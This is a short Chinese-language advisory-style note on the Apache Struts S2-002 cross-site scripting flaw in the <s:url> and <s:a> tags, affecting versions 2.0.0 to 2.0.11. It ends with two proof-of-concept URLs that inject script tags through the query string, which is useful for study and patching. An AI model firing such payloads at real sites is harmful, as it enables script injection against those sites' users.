menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-xxxx-xxxx)s2-002 chevron_right (CVE-xxxx-xxxx)s2-002.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-xxxx-xxxx)s2-002.md
    833 B / 2021-07-15 19:48:38
        (CVE-xxxx-xxxx)s2-002
=======================

一、漏洞简介
------------

    对于<s:url>和<s:a>标签,可以在构造和呈现标签的结果URL时注入不能正确转义的参数值。以下情况是已知的:
    构造<s:a>结果中包含的参数值可以注入未转义的双引号,从而可以通过转义已渲染的href属性来在生成的HTML中注入代码。
    当includeParams设置为“none”的任何其他值时,<s:url>和<s:a>标签无法转义<script>标签,可以通过使用GET参数调用包含JSP /动作来利用

二、漏洞影响
------------

Struts 2.0.0 - Struts 2.0.11

三、复现过程
------------

### poc

    http://www.0-sec.org:8080/index.action?"><script>alert(1)</script><"
    http://www.0-sec.org:8080/index.action?<script>alert(1)</script>test=hello
    links
    file_download